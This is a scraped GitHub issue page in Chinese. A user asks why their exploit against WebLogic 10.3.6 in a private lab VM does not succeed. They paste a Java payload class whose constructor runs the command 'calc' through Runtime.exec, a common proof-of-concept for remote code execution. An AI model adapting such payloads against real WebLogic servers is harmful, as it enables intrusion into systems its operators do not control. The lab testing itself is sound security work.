We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
师傅,我这个命令一直无法利用成功,能帮忙看看是什么原因吗?
虚拟机: 192.168.0.101 Weblogic 10.3.6 Jdk:6u45
主机: 192.168.0.105 Jdk: jdk14和6u45(编译时使用的6u45)
EXP:
package payload; import java.io.IOException; public class exp { public exp() { String cmd = "calc"; try { Runtime.getRuntime().exec(cmd).getInputStream(); } catch (IOException e) { e.printStackTrace(); } } }
The text was updated successfully, but these errors were encountered:
No branches or pull requests
师傅,我这个命令一直无法利用成功,能帮忙看看是什么原因吗?
虚拟机:
192.168.0.101
Weblogic 10.3.6
Jdk:6u45
主机:
192.168.0.105
Jdk: jdk14和6u45(编译时使用的6u45)
EXP:
The text was updated successfully, but these errors were encountered: